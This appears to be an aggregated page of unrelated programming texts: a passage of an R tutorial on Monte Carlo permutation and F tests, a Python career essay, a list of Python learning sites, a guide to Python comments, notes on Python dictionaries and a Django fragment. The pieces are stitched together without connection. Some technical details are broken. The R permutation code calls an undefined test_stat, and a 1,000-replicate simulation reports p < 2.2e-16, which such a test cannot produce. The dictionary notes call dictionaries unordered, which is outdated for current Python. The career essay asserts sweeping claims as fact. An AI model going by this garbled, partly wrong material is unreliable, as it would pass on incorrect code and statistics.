2. Compute N copies of the test statistic on the new samples; suppose the test statistic used is the difference in means, xbar - ybar.
3. Compute the test statistic on the actual sample and compare it to the simulated statistics. If the actual statistic is relatively large compared to the simulated statistics, reject the null hypothesis in favor of the alternative; otherwise, don't reject.

In practice, step 3 is done by computing a p-value representing the proportion of simulated statistics larger than the one actually computed.
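The procedure in steps 1-3 is language-agnostic; as a from-scratch illustration (not how MCHT implements it, and with made-up sample data), it can be sketched like so:

```python
import random

def permutation_test(x, y, n_sim=1000, seed=123):
    """One-sided permutation test of H0: mu_X = mu_Y vs HA: mu_X > mu_Y."""
    rng = random.Random(seed)
    combined = list(x) + list(y)
    m = len(x)
    observed = sum(x) / len(x) - sum(y) / len(y)
    count = 0
    for _ in range(n_sim):
        rng.shuffle(combined)                      # randomly reassign labels
        new_x, new_y = combined[:m], combined[m:]
        stat = sum(new_x) / m - sum(new_y) / len(new_y)
        if stat >= observed:                       # simulated stat at least as extreme
            count += 1
    return count / n_sim                           # permutation p-value

x = [2.1, 1.8, 2.5, 3.0, 1.2]                      # made-up sample with a higher mean
y = [0.3, -0.5, 0.2, 1.1, -0.2, 0.0, 0.4, -1.0, 0.6, 0.1]
p = permutation_test(x, y)
print(p)   # small p-value, so H0 would be rejected
```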

Permutation Tests Using MCHT

The permutation test is effectively a bootstrap test, so it is supported by MCHT, though one may wonder how that's the case when the parameters test_stat, stat_gen, and rand_gen each accept only one parameter, x, representing the dataset (as opposed to, say, t.test(), which has an x and an optional y parameter). But MCHTest() makes very few assumptions about what object x actually is; if your object is either a vector or tabular, then the MCHTest object should not have a problem with it (it's possible even a loosely structured list would be fine, but I have not tested this; tabular formats should cover most use cases).

In this case, putting our data in long-form format makes doing a permutation test fairly simple. One column contains the group an observation belongs to, while the other contains the observation values. The test_stat function splits the data by group, computes group-wise means, and finally computes the test statistic. rand_gen generates new datasets by permuting the labels in the data frame. stat_gen merely serves as the glue between the two.

The result is the following test.

library(MCHT)
library(doParallel)

registerDoParallel(detectCores())

ts <- function(x) {
  grp_means <- aggregate(value ~ group, data = x, FUN = mean)
  grp_means$value[1] - grp_means$value[2]
}

rg <- function(x) {
  x$group <- sample(x$group)
  x
}

sg <- function(x) {
  test_stat(x)
}

permute.test <- MCHTest(ts, sg, rg, seed = 123, N = 1000,
                        localize_functions = TRUE)

df <- data.frame("value" = c(rnorm(5, 2, 1), rnorm(10, 0, 1)),
                 "group" = rep(c("x", "y"), times = c(5, 10)))

permute.test(df)

## 
##  Monte Carlo Test
## 
## data:  df
## S = 1.3985, p-value = 0.036

Linear Regression F Test

Suppose that for each observation in our dataset there is an outcome of interest, y_i, and K variables x_{i1}, ..., x_{iK} that could together help predict the value of y_i if they are known. Consider then the following linear regression model (with epsilon_i a random error term):

y_i = beta_0 + beta_1 x_{i1} + ... + beta_K x_{iK} + epsilon_i

The first question someone should ask when considering a regression model is whether it's worth anything at all. An alternative approach to predicting y_i is simply to predict its mean value. That is, the model

y_i = beta_0 + epsilon_i

is much simpler, and it should be preferred to the more complicated model listed above if it's just as good at explaining the behavior of y_i for all i. Notice that the second model is simply the first model with all the coefficients beta_1, ..., beta_K identically equal to zero.

The F test (described in more detail here) can help us decide between these two competing models. Under the null hypothesis, the second model is the true model:

H0: beta_1 = ... = beta_K = 0

The alternative says that at least one of the regressors is helpful in predicting y_i:

HA: beta_j != 0 for at least one j

We can use the F statistic to decide between the two models:

F = [(SSE_2 - SSE_1) / K] / [SSE_1 / (n - K - 1)]

where SSE_1 and SSE_2 are the residual sums of squares of models 1 and 2, respectively.

This test is called the F test because usually the F distribution is used to compute p-values (as this is the distribution the F statistic should follow when certain conditions hold, at least asymptotically if not exactly). What, then, would a bootstrap-based procedure look like?

If the null hypothesis is true, then the best model for the data is

y_i = ybar + e_i

where ybar is the sample mean of y and e_i is the residual. This suggests the following procedure:

1. Shuffle y over all rows of the input dataset, with replacement, to generate new datasets.
2. Compute F statistics for each of the generated datasets.
3. Compare the F statistic of the actual dataset to the generated datasets' statistics.

F Test Using MCHT

Let's perform the F test on a subset of the iris dataset. We will see whether there is a relationship between sepal length and sepal width among iris setosa flowers. Below is an initial split and visualization:

library(dplyr)

setosa <- iris %>% filter(Species == "setosa") %>%
  select(Sepal.Length, Sepal.Width)

plot(Sepal.Width ~ Sepal.Length, data = setosa)

[Figure: scatterplot of Sepal.Width vs. Sepal.Length]

There is an obvious relationship between the variables, so we should expect the test to reject the null hypothesis. That is what we would conclude if we were to run the conventional F test:

res <- lm(Sepal.Width ~ Sepal.Length, data = setosa)
summary(res)

## 
## Call:
## lm(formula = Sepal.Width ~ Sepal.Length, data = setosa)
## 
## Residuals:
##      Min       1Q   Median       3Q      Max 
## -0.72394 -0.18273 -0.00306  0.15738  0.51709 
## 
## Coefficients:
##              Estimate Std. Error t value Pr(>|t|)    
## (Intercept)   -0.5694     0.5217  -1.091    0.281    
## Sepal.Length   0.7985     0.1040   7.681 6.71e-10 ***
## ---
## Signif. codes:  0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1
## 
## Residual standard error: 0.2565 on 48 degrees of freedom
## Multiple R-squared:  0.5514, Adjusted R-squared:  0.542 
## F-statistic: 58.99 on 1 and 48 DF,  p-value: 6.71e-10

Let’s now implement the procedure I described with MCHTest() .

ts <- function(x) {
  res <- lm(Sepal.Width ~ Sepal.Length, data = x)
  summary(res)$fstatistic[[1]]  # Only way I know to automatically compute the
                                # statistic
}

# rand_gen's function can use both x and n, and n will be the number of rows of
# the dataset
rg <- function(x, n) {
  x$Sepal.Width <- sample(x$Sepal.Width, replace = TRUE, size = n)
  x
}

b.f.test.1 <- MCHTest(ts, ts, rg, seed = 123, N = 1000)

b.f.test.1(setosa)

## 
##  Monte Carlo Test
## 
## data:  setosa
## S = 58.994, p-value < 2.2e-16

Excellent! It reached the correct conclusion.

Conclusion

One may naturally ask whether we can write functions a bit more general than what I've shown here, at least in the regression context. For example, one may want a parameter specifying a formula so that the regression model isn't hard-coded into the test. In short, the answer is yes; MCHTest objects try to pass as many parameters to the input functions as they can.

Here is the revised example that works for basically any formula:

ts <- function(x, formula) {
  res <- lm(formula = formula, data = x)
  summary(res)$fstatistic[[1]]
}

rg <- function(x, n, formula) {
  dep_var <- all.vars(formula)[1]  # Get the name of the dependent variable
  x[[dep_var]] <- sample(x[[dep_var]], replace = TRUE, size = n)
  x
}

b.f.test.2 <- MCHTest(ts, ts, rg, seed = 123, N = 1000)

b.f.test.2(setosa, formula = Sepal.Width ~ Sepal.Length)

## 
##  Monte Carlo Test
## 
## data:  setosa
## S = 58.994, p-value < 2.2e-16

This shows that you can have a lot of control over how MCHTest objects handle their inputs, giving you considerable flexibility.

Next post: time series and MCHT

References

R. A. Fisher, The Design of Experiments (1935)



Self-Taught Python but Can't Find a Job? If You Only Study an Hour a Day, the Veterans Would Advise You to Give Up

Python's growth can fairly be called meteoric. More and more people are choosing to learn it, and more are paying attention to it. Judging by that attention, what people care about most is Python's job prospects; after all, most people learn Python in the hope of landing a good job. So is Python a reliable path to employment? The answer is certainly yes.

As the saying goes, dripping water wears through stone only with time. Yet some people strive for a lifetime without matching what others achieve in a year, and a year of one person's study may not equal a month of another's. Some people never figure out why.

Even with Python this popular, why can't you find a job after a year of studying it?

I think four points are key:

1. Too much focus on money:

People in urgent need of money fixate on the word "money." The stronger the focus on quick returns and the weaker the genuine drive, the more anxiously you study and the less you actually learn.

2. Weak fundamentals:

If you have zero programming background, or a very thin one, your current job probably involves no programming at all. You may still be a complete beginner with no sense of direction: you know the name "Python" and some basic syntax, and nothing else. In that situation, learning is even harder.

3. No interest:

No interest in programming at all. If you had any, then after a year of studying Python you would at least be able to find a decent job. Questions like this usually come from people who pay no attention to internet technology and how it develops.

Studying programming with a purely mercenary motive makes even simple things hard. If you cannot set that aside, and you have no genuine interest in programming, it is better not to enter this field at all.

4. You have learned other languages, so deep down you look down on Python:

Ten years ago: Pascal. I would precisely calculate the memory used by every array and variable, fluently rewrite programs without recursion, and implement all kinds of sorts in minimal time, plus multi-source shortest paths, convex hulls and nearest neighbors, dynamic programming, bipartite matching, and network-flow algorithms, all while weighing the worst-case complexity and the constant in front of the leading term. Today I remember none of it. Yes, listing these terms now is just showing off.

A few observations:

Fact: companies find it hard to recruit qualified programmers. Anyone who cannot find a job has simply not reached the minimum bar for hiring.

In April 2017 I attended the Gopher China 2017 conference in Shanghai. Companies set up booths to recruit programmers, speakers recruited after finishing their talks, and even some attendees were recruiting. And that is just the situation for Golang.

1. There are plenty of Python positions, slightly fewer than for Java or PHP, but at the same skill level a Python programmer earns somewhat more than a PHP programmer.

2. In Beijing, Shanghai, Guangzhou, Shenzhen, Chengdu, Wuhan, Hangzhou, and similar cities there are plenty of Python positions; elsewhere there are fewer.

So finding work is not the problem. Here is what it takes to meet employers' needs.

3. You have to be solid yourself. Only by passing a company's interview do you get to be a programmer. Many people hear that programmers are well paid, but flinch at the first difficulty; that is not the right attitude for learning to program.

4. Use the right learning method: self-study what you can, and find a mentor or a training course for what you cannot.

5. I have met self-styled Python programmers who felt quite good about themselves and failed every interview they took.


          The 5 Best Websites to Learn Python Programming      Cache   Translate Page      

Over the past decade, the python programming language has exploded in popularity for all types of coding. From web developers to video game designers, from data scientists to in-house tool creators, many have fallen in love with Python. Why? Because Python is easy to learn, easy to use, and very powerful.

Want to learn Python programming? Here are some of the best resources and ways to learn Python online, many of which are entirely free. For optimal results, we recommend that you utilize ALL of these websites, as they each have their own pros and cons.

1. How to Think Like a Computer Scientist

One of the best Python tutorials on the web, the How to Think Like a Computer Scientist interactive web tutorial is great because it not only teaches you how to use the Python programming language, but also how to think like a programmer. If this is the first time you’ve ever touched code, then this site will be an invaluable resource for you.

Keep in mind, however, that learning how to think like a computer scientist will require a complete shift in your mental paradigm. Grasping this shift may be easy for some and difficult for others, but as long as you persevere, it will eventually click. And once you’ve learned how to think like a computer scientist, you’ll be able to learn programming languages other than Python with ease!

2. The Official Python Tutorial

What better place to learn Python than on the official Python website? The creators of the language itself have devised a large and helpful guide that walks you through the language basics.

The best part of this web tutorial is that it moves slowly, drilling specific concepts into your head from multiple angles to make sure you truly understand them before moving on. The website’s formatting is simple and pleasing to the eye, which just makes the whole experience that much easier.

If you have some background in programming, the official Python tutorial may be too slow and boring for you―but if you’re a brand newbie, you’ll likely find it to be an indispensable resource on your journey.

3. A Byte of Python

The A Byte of Python web tutorial series is awesome for those who want to learn Python and have a bit of previous experience with programming. The very first part of the tutorial walks you through the steps necessary to set up a Python interpreter on your computer, which can be a troublesome process for first timers.

There is one drawback to this website: it does try to dive in a bit too quickly. As someone with Python experience under my belt, I can see how newbies might be intimidated by how quickly the author moves through the language.

But if you can keep up, then A Byte of Python is a fantastic resource. If you can’t? Try some of the other Python tutorial websites in this list first, and once you have a better grasp of the language, come back and try this one again.

4. LearnPython

Unlike the previously listed Python tutorial sites, LearnPython is great because the website itself has a built-in Python interpreter. This means you can play around with Python coding right on the website, eliminating the need for you to muck around and install a Python interpreter on your system first.

Of course, you’ll need to install an interpreter eventually if you plan on getting serious with the language, but LearnPython actually lets you try Python before investing too much time setting up a language that you might end up not using.

LearnPython’s tutorial incorporates the interpreter, which allows you to play around with code in real-time, making changes and experimenting as you learn. The programming exercises at the end of each lesson are helpful, too.

5. Learn X in Y Minutes: Python 3

Let’s say you have plenty of programming experience and you already know how to think like a programmer, but Python is new to you and you just want to get to grips with the actual syntax of the language. In that case, Learn X in Y Minutes is the best website for you.

True to its name, this site lays out all of the syntactic nuances of Python in code format so that you can learn all of the important bits of Python’s syntax in under 15 minutes. It’s succinct enough to suffice as a reference―bookmark the page and come back to it whenever you forget a certain aspect of Python.

In fact, Learn X in Y Minutes is my favorite resource for learning any programming language’s syntax.

Bonus Resource: CodeWars

CodeWars isn’t so much a tutorial as it is a gamified way to test your programming knowledge . It consists of hundreds of different coding puzzles (called “katas”), which force you to take what you’ve learned from the aforementioned Python websites and apply them to real-life problems.

The katas on CodeWars are categorized by difficulty, and they do have an instructive quality to them, so you’ll definitely learn as you go through each puzzle. As you complete katas, you’ll “level up” and gain access to harder katas. But the best part? You can compare your solutions with solutions submitted by others, which will significantly accelerate your learning.

Though it has a relatively shallow learning curve, Python is a powerful language that can be utilized in multiple applications. Its popularity has grown consistently over the years, and there’s no indication that the language will disappear any time soon.

Still have questions? Check out our answers to the most frequently asked questions about Python programming, where we walk you through everything you need to know about Python as a beginner.


          Writing Comments in Python (Guide)      Cache   Translate Page      

When writing code in python, it’s important to make sure that your code can be easily understood by others . Giving variables obvious names, defining explicit functions, and organizing your code are all great ways to do this.

Another awesome and easy way to increase the readability of your code is by using comments !

In this tutorial, you’ll cover some of the basics of writing comments in Python. You’ll learn how to write comments that are clean and concise, and when you might not need to write any comments at all.

You’ll also learn:

Why it’s so important to comment your code
Best practices for writing comments in Python
Types of comments you might want to avoid
How to practice writing cleaner comments


Why Commenting Your Code Is So Important

Comments are an integral part of any program. They can come in the form of module-level docstrings, or even inline explanations that help shed light on a complex function.

Before diving into the different types of comments, let’s take a closer look at why commenting your code is so important.

Consider the following two scenarios in which a programmer decided not to comment their code.

When Reading Your Own Code

Client A wants a last-minute deployment for their web service. You’re already on a tight deadline, so you decide to just make it work. All that “extra” stuff―documentation, proper commenting, and so forth―you’ll add that later.

The deadline comes, and you deploy the service, right on time. Whew!

You make a mental note to go back and update the comments, but before you can put it on your to-do list, your boss comes over with a new project that you need to get started on immediately. Within a few days, you’ve completely forgotten that you were supposed to go back and properly comment the code you wrote for Client A.

Fast forward six months, and Client A needs a patch built for that same service to comply with some new requirements. It’s your job to maintain it, since you were the one who built it in the first place. You open up your text editor and…

What did you even write?!

You spend hours parsing through your old code, but you’re completely lost in the mess. You were in such a rush at the time that you didn’t name your variables properly or even set your functions up in the proper control flow. Worst of all, you don’t have any comments in the script to tell you what’s what!

Developers forget what their own code does all the time, especially if it was written a long time ago or under a lot of pressure. When a deadline is fast approaching, and hours in front of the computer have led to bloodshot eyes and cramped hands, that pressure can be reflected in the form of code that is messier than usual.

Once the project is submitted, many developers are simply too tired to go back and comment their code. When it’s time to revisit it later down the line, they can spend hours trying to parse through what they wrote.

Writing comments as you go is a great way to prevent the above scenario from happening. Be nice to Future You!

When Others Are Reading Your Code

Imagine you’re the only developer working on a small Django project . You understand your own code pretty well, so you don’t tend to use comments or any other sort of documentation, and you like it that way. Comments take time to write and maintain, and you just don’t see the point.

The only problem is, by the end of the year your “small Django project” has turned into a “20,000 lines of code” project, and your supervisor is bringing on additional developers to help maintain it.

The new devs work hard to quickly get up to speed, but within the first few days of working together, you’ve realized that they’re having some trouble. You used some quirky variable names and wrote with super terse syntax. The new hires spend a lot of time stepping through your code line by line, trying to figure out how it all works. It takes a few days before they can even help you maintain it!

Using comments throughout your code can help other developers in situations like this one. Comments help other devs skim through your code and gain an understanding of how it all works very quickly. You can help ensure a smooth transition by choosing to comment your code from the outset of a project.

How to Write Comments in Python

Now that you understand why it’s so important to comment your code, let’s go over some basics so you know how to do it properly.

Python Commenting Basics

Comments are for developers. They describe parts of the code where necessary to facilitate the understanding of programmers, including yourself.

To write a comment in Python, simply put the hash mark # before your desired comment:

# This is a comment

Python ignores everything after the hash mark and up to the end of the line. You can insert them anywhere in your code, even inline with other code:

print("This will run.") # This won't run

When you run the above code, you will only see the output This will run. Everything else is ignored.

Comments should be short, sweet, and to the point. While PEP 8 advises keeping code at 79 characters or fewer per line, it suggests a max of 72 characters for inline comments and docstrings. If your comment is approaching or exceeding that length, then you’ll want to spread it out over multiple lines.

Python Multiline Comments

Unfortunately, Python doesn’t have a way to write multiline comments as you can in languages such as C, Java, and Go:

# So you can't
just do this
in python

In the above example, the first line will be ignored by the program, but the other lines will raise a SyntaxError.

In contrast, a language like Java will allow you to spread a comment out over multiple lines quite easily:

/* You can easily
write multiline
comments in Java */

Everything between /* and */ is ignored by the program.

While Python doesn’t have native multiline commenting functionality, you can create multiline comments in Python. There are two simple ways to do so.

The first way is simply by pressing the return key after each line, adding a new hash mark and continuing your comment from there:

def multiline_example():
    # This is a pretty good example
    # of how you can spread comments
    # over multiple lines in Python

Each line that starts with a hash mark will be ignored by the program.

Another thing you can do is use multiline strings by wrapping your comment inside a set of triple quotes:

""" If I really hate pressing `enter` and typing all those hash marks, I could just do this instead """

This is like multiline comments in Java, where everything enclosed in the triple quotes will function as a comment.

While this gives you the multiline functionality, this isn’t technically a comment. It’s a string that’s not assigned to any variable, so it’s not called or referenced by your program. Still, since it’ll be ignored at runtime and won’t appear in the bytecode, it can effectively act as a comment. (You can take a look at this article for proof that these strings won’t show up in the bytecode.)

However, be careful where you place these multiline “comments.” Depending on where they sit in your program, they could turn into docstrings , which are pieces of documentation that are associated with a function or method. If you slip one of these bad boys right after a function definition, then what you intended to be a comment will become associated with that object.

Be careful where you use these, and when in doubt, just put a hash mark on each subsequent line. If you’re interested in learning more about docstrings and how to associate them with modules, classes, and the like, check out our tutorial on Documenting Python Code .
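To see why this matters, consider a minimal sketch (the greet function is invented for illustration): a triple-quoted string placed directly after a def line is stored as the function's docstring rather than discarded as a comment.

```python
def greet(name):
    """
    This was meant as a multiline comment, but because it sits
    directly after the function definition, Python attaches it
    to the function as its docstring.
    """
    return "Hello, " + name

# The "comment" now lives in the function's .__doc__ attribute:
print(greet.__doc__ is not None)  # True
print(greet("world"))             # Hello, world
```

If the same string sat between two statements inside the function body instead, it would be evaluated and thrown away, behaving like a comment.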

Python Commenting Shortcuts

It can be tedious to type out all those hash marks every time you need to add a comment. So what can you do to speed things up a bit? Here are a few tricks to help you out when commenting.

One of the first things you can do is use multiple cursors. That’s exactly what it sounds like: placing more than one cursor on your screen to accomplish a task. Simply hold down the Ctrl or Cmd key while you left-click, and you should see the blinking lines on your screen:



This is most effective when you need to comment the same thing in several places.

What if you’ve got a long stretch of text that needs to be commented out? Say you don’t want a defined function to run in order to check for a bug. Clicking each and every line to comment it out could take a lot of time! In these cases, you’ll want to toggle comments instead. Simply select the desired code and press Ctrl + / on PC, or Cmd + / on Mac:



All the highlighted text will be prepended with a hash mark and ignored by the program.

If your comments are getting too unwieldy, or the comments in a script you’re reading are really long, then your text editor may give you the option to collapse them using the small down arrow on the left-hand side:



Simply click the arrow to hide the comments. This works best with long comments spread out over multiple lines, or docstrings that take up most of the start of a program.

Combining these tips will make commenting your code quick, easy, and painless!

Python Commenting Best Practices

While it’s good to know how to write comments in Python, it’s just as vital to make sure that your comments are readable and easy to understand.

Take a look at these tips to help you write comments that really support your code.

When Writing Code for Yourself

You can make life easier for yourself by commenting your own code properly. Even if no one else will ever see it, you’ll see it, and that’s enough reason to make it right. You’re a developer after all, so your code should be easy for you to understand as well.

One extremely useful way to use comments for yourself is as an outline for your code. If you’re not sure how your program is going to turn out, then you can use comments as a way to keep track of what’s left to do, or even as a way of tracking the high-level flow of your program. For instance, use comments to outline a function in pseudo-code:

from collections import defaultdict

def get_top_cities(prices):
    top_cities = defaultdict(int)

    # For each price range
        # Get city searches in that price
        # Count num times city was searched
        # Take top 3 cities & add to dict

    return dict(top_cities)

These comments plan out get_top_cities() . Once you know exactly what you want your function to do, you can work on translating that to code.

Using comments like this can help keep everything straight in your head. As you walk through your program, you’ll know what’s left to do in order to have a fully functional script. After “translating” the comments to code, remember to remove any comments that have become redundant so that your code stays crisp and clean.
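As one hypothetical way to finish the job, the outline above could be translated into code like this. The structure of prices is an assumption (the outline never defines it), and Counter stands in for the sketched defaultdict, so treat this as an illustration rather than the article's actual implementation:

```python
from collections import Counter

def get_top_cities(prices):
    # Assumes `prices` maps a price range to a list of searched
    # city names, e.g. {"$0-100": ["Austin", "Austin", "Boise"]}
    top_cities = {}

    # For each price range
    for price_range, searches in prices.items():
        # Count num times each city was searched
        counts = Counter(searches)
        # Take top 3 cities & add to dict
        top_cities[price_range] = [city for city, _ in counts.most_common(3)]

    return top_cities

searches = {"$0-100": ["Austin", "Austin", "Boise", "Denver", "Denver", "Reno"]}
print(get_top_cities(searches))  # {'$0-100': ['Austin', 'Denver', 'Boise']}
```

Once the comments have become code, the planning comments that merely repeat the code can be deleted.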

You can also use comments as part of the debugging process. Comment out the old code and see how that affects your output. If you agree with the change, then don’t leave the code commented out in your program, as it decreases readability. Delete it and use version control if you need to bring it back.

Finally, use comments to define tricky parts of your own code. If you put a project down and come back to it months or years later, you’ll spend a lot of time trying to get reacquainted with what you wrote. In case you forget what your own code does, do Future You a favor and mark it down so that it will be easier to get back up to speed later on.

When Writing Code for Others

People like to skim and jump back and forth through text, and reading code is no different. The only time you’ll probably read through code line by line is when it isn’t working and you have to figure out what’s going on.

In most other cases, you’ll take a quick glance at variables and function definitions in order to get the gist. Having comments to explain what’s happening in plain English can really assist a developer in this position.

Be nice to your fellow devs and use comments to help them skim through your code. Inline comments should be used sparingly to clear up bits of code that aren’t obvious on their own. (Of course, your first priority should be to make your code stand on its own, but inline comments can be useful in this regard.)

If you have a complicated method or function whose name isn’t easily understandable, you may want to include a short comment after the def line to shed some light:

def complicated_function(s):
    # This function does something complicated

This can help other devs who are skimming your code get a feel for what the function does.

For any public functions, you’ll want to include an associated docstring, whether it’s complicated or not:

def sparsity_ratio(x: np.array) -> float:
    """Return a float

    Percentage of values in array that are zero or NaN
    """

This string will become the .__doc__ attribute of your function and will officially be associated with that specific method. The PEP 257 docstring guidelines will help you to structure your docstring. These are a set of conventions that developers generally use when structuring docstrings.

The PEP 257 guidelines have conventions for multiline docstrings as well. These docstrings appear right at the top of a file and include a high-level overview of the entire script and what it’s supposed to do:

# -*- coding: utf-8 -*-
"""A module-level docstring

Notice the comment above the docstring specifying the
encoding. Docstrings do appear in the bytecode, so you can
access this through the ``__doc__`` attribute. This is also
what you'll see if you call help() on a module or any other
Python object.
"""

A module-level docstring like this one will contain any pertinent or need-to-know information for the developer reading it. When writing one, it’s recommended to list out all classes, exceptions, and functions as well as a one-line summary for each.

Python Commenting Worst Practices

Just as there are standards for writing Python comments, there are a few types of comments that don’t lead to Pythonic code. Here are just a few.

Avoid: W.E.T. Comments

Your comments should be D.R.Y. The acronym stands for the programming maxim “Don’t Repeat Yourself.” This means that your code should have little to no redundancy. You don’t need to comment a piece of code that sufficiently explains itself, like this one:

return a # Returns a

We can clearly see that a is returned, so there’s no need to explicitly state this in a comment. This makes comments W.E.T., meaning you “wrote everything twice.” (Or, for the more cynical out there, “wasted everyone’s time.”)

W.E.T. comments can be a simple mistake, especially if you used comments to plan out your code before writing it. But once you’ve got the code running well, be sure to go back and remove comments that have become unnecessary.

Avoid: Smelly Comments

Comments can be a sign of “code smell,” which is anything that indicates there might be a deeper problem with your code. Code smells try to mask the underlying issues of a program, and comments are one way to try and hide those problems. Comments should support your code, not try to explain it away. If your code is poorly written, no amount of commenting is going to fix it.

Let’s take this simple example:

# A dictionary of families who live in each city
mydict = {
    "Midtown": ["Powell", "Brantley", "Young"],
    "Norcross": ["Montgomery"],
    "Ackworth": []
}

def a(dict):
    # For each city
    for p in dict:
        # If there are no families in the city
        if not mydict[p]:
            # Say that there are no families
            print("None.")

This code is quite unruly. There’s a comment before every line explaining what the code does. This script could have been made simpler by assigning obvious names to variables, functions, and collections, like so:

families_by_city = {
    "Midtown": ["Powell", "Brantley", "Young"],
    "Norcross": ["Montgomery"],
    "Ackworth": [],
}

def no_families(cities):
    for city in cities:
        if not cities[city]:
            print(f"No families in {city}.")

By using obvious naming conventions, we were able to remove all unnecessary comments and reduce the length of the code as well!

Your comments should rarely be longer than the code they support. If you’re spending too much time explaining what you did, then you need to go back and refactor to make your code more clear and concise.

Avoid: Rude Comments

This is something that’s likely to come up when working on a development team. When several people are all working on the same code, others are going to be going in and reviewing what you’ve written and making changes. From time to time, you might come across someone who dared to write a comment like this one:

# Put this here to fix Ryan's stupid-a** mistake

Honestly, it’s just a good idea to not do this. It’s not okay if it’s your friend’s code, and you’re sure they won’t be offended by it. You never know what might get shipped to production, and how is it going to look if you’d accidentally left that comment in there, and a client discovered it down the road? You’re a professional, and including vulgar words in your comments is not the way to show that.

How to Practice Commenting

The simplest way to start writing more Pythonic comments is just to do it!

Start writing comments for yourself in your own code. Make it a point to include simple comments from now on where necessary. Add some clarity to complex functions, and put a docstring at the top of all your scripts.

Another good way to practice is to go back and review old code that you’ve written. See where anything might not make sense, and clean up the code. If it still needs some extra support, add a quick comment to help clarify the code’s purpose.

This is an especially good idea if your code is up on GitHub and people are forking your repo. Help them get started by guiding them through what you’ve already done.

You can also give back to the community by commenting other people’s code. If you’ve downloaded something from GitHub and had trouble sifting through it, add comments as you come to understand what each piece of code does.

“Sign” your comment with your initials and the date, and then submit your changes as a pull request. If your changes are merged, you could be helping dozens if not hundreds of developers like yourself get a leg up on their next project.

Conclusion

Learning to comment well is a valuable tool. Not only will you learn how to write more clearly and concisely in general, but you’ll no doubt gain a deeper understanding of Python as well.

Knowing how to write comments in Python can make life easier for all developers, including yourself! They can help other devs get up to speed on what your code does, and help you get re-acquainted with old code of your own.

By noticing when you’re using comments to try and support poorly written code, you’ll be able to go back and modify your code to be more robust. Commenting previously written code, whether your own or another developer’s, is a great way to practice writing clean comments in Python.

As you learn more about documenting your code, you can consider moving on to the next level of documentation. Check out our tutorial on Documenting Python Code to take the next step.


Python Crash Course Study Notes: Dictionaries

A dictionary is like a phone book that lets you look up a contact's number by name: it associates keys (the names) with values (the phone numbers). Note that keys must be unique, and in Python only immutable objects (such as strings) can serve as dictionary keys, while either mutable or immutable objects can serve as values. A simple dictionary looks like this:

alien = {'color': 'green', 'points': 5}

Key-value pairs in a dictionary are written as d = {key1: value1, key2: value2}. A colon separates each key from its value, commas separate the pairs, and the whole thing is wrapped in curly braces. The key-value pairs in a dictionary are unordered; if you need a specific order, sort them yourself before use.

Using dictionaries

Accessing values in a dictionary

Give the dictionary name followed by the key in square brackets, as shown here:

alien = {'color': 'green', 'points': 5}
print(alien['color'])

# Output:
green

Creating a dictionary and modifying its values

To create an empty dictionary, define it with an empty pair of curly braces, then add key-value pairs one per line.

To modify a value, give the dictionary name, the key, and the new value to assign:

alien = {}
alien['x_position'] = 0
alien['y_position'] = 25
print(alien)

alien['x_position'] = 25
print(alien)

# Output:
{'x_position': 0, 'y_position': 25}
{'x_position': 25, 'y_position': 25}

Adding and removing key-value pairs

A dictionary is a dynamic structure.

To add a key-value pair, give the dictionary name, the key in square brackets, and the value to assign.

To remove a key-value pair, use the del statement with the dictionary name and the key to delete:

alien = {'color': 'green', 'points': 5}
print(alien)

alien['x_position'] = 0
alien['y_position'] = 25
print(alien)

del alien['color']
print(alien)

# Output:
{'color': 'green', 'points': 5}
{'color': 'green', 'points': 5, 'y_position': 25, 'x_position': 0}
{'points': 5, 'y_position': 25, 'x_position': 0}

Looping through a dictionary

Looping through all key-value pairs

user = {
    'username': 'efermi',  # indented four spaces, as below
    'first': 'enrico',
    'last': 'fermi',
    }

for key, value in user.items():
    print("\nKey: " + key)
    print("Value: " + value)

# Output:
Key: last
Value: fermi

Key: first
Value: enrico

Key: username
Value: efermi

As shown above, when looping through a dictionary you can declare two variables to hold the key and value of each pair. The dictionary method items() returns a list of key-value pairs. Note that the pairs are not returned in the order they were stored; Python cares only about the associations between keys and values.

Looping through all the keys or values in a dictionary

Use the keys() method to loop through all the keys in a dictionary, or omit the method, since looping over a dictionary iterates over its keys by default.

Use the values() method to loop through all the values; it returns a list of values.

favorite_languages = {
    'jen': 'python',
    'sarah': 'c',
    'edward': 'ruby',
    'phil': 'python',
    }

for name in favorite_languages.keys():
    print(name.title())

for language in favorite_languages.values():
    print(language.title())

# Output:
Jen
Sarah
Edward
Phil
Python
C
Ruby
Python

Omitting the method loops over the keys by default, so for name in favorite_languages.keys(): is equivalent to for name in favorite_languages:.

To loop in a particular order, simply use sorted().
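A minimal sketch of looping over the keys in order with sorted(), reusing the favorite_languages dictionary shown earlier:

```python
favorite_languages = {
    'jen': 'python',
    'sarah': 'c',
    'edward': 'ruby',
    'phil': 'python',
    }

# sorted() returns a temporary, alphabetically ordered copy of
# the keys without changing the dictionary itself
for name in sorted(favorite_languages.keys()):
    print(name.title())

# Output:
# Edward
# Jen
# Phil
# Sarah
```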

Nesting

Storing a series of dictionaries in a list, or a list as a value inside a dictionary, is called nesting.

A list of dictionaries

Store a series of dictionaries in a list:

alien_0 = {'color': 'green', 'points': 5}
alien_1 = {'color': 'yellow', 'points': 10}
alien_2 = {'color': 'red', 'points': 15}

aliens = [alien_0, alien_1, alien_2]

for alien in aliens:
    print(alien)

# Output:
{'color': 'green', 'points': 5}
{'color': 'yellow', 'points': 10}
{'color': 'red', 'points': 15}

A list in a dictionary

Store a list as a value in a dictionary:

lili = {
    'name': 'lili',
    'phonenum': ['123', '456'],
    }

print("lili's name is " + lili['name'] + " and her phonenum is ")
for num in lili['phonenum']:
    print("\t" + num)

# Output:
lili's name is lili and her phonenum is
	123
	456

A dictionary in a dictionary

To store information about a website's users, you can nest dictionaries inside a dictionary, for example:

users = {
    'aeinstein': {
        'first': 'albert',
        'last': 'einstein',
        'location': 'princeton',
        },
    'mcurie': {
        'first': 'marie',
        'last': 'curie',
        'location': 'paris',
        },
    }

for username, user_info in users.items():
    print("\nUsername: " + username)
    full_name = user_info['first'] + " " + user_info['last']
    location = user_info['location']
    print("\tFull name: " + full_name.title())
    print("\tLocation: " + location.title())

# Output:
Username: aeinstein
	Full name: Albert Einstein
	Location: Princeton

Username: mcurie
	Full name: Marie Curie
	Location: Paris
Building a Personal Blog with Django: Deleting Users

The logic for deleting user data is not complicated in itself, but it raises a new concern.

User data is the most valuable asset of many websites, so keeping it safe is extremely important.

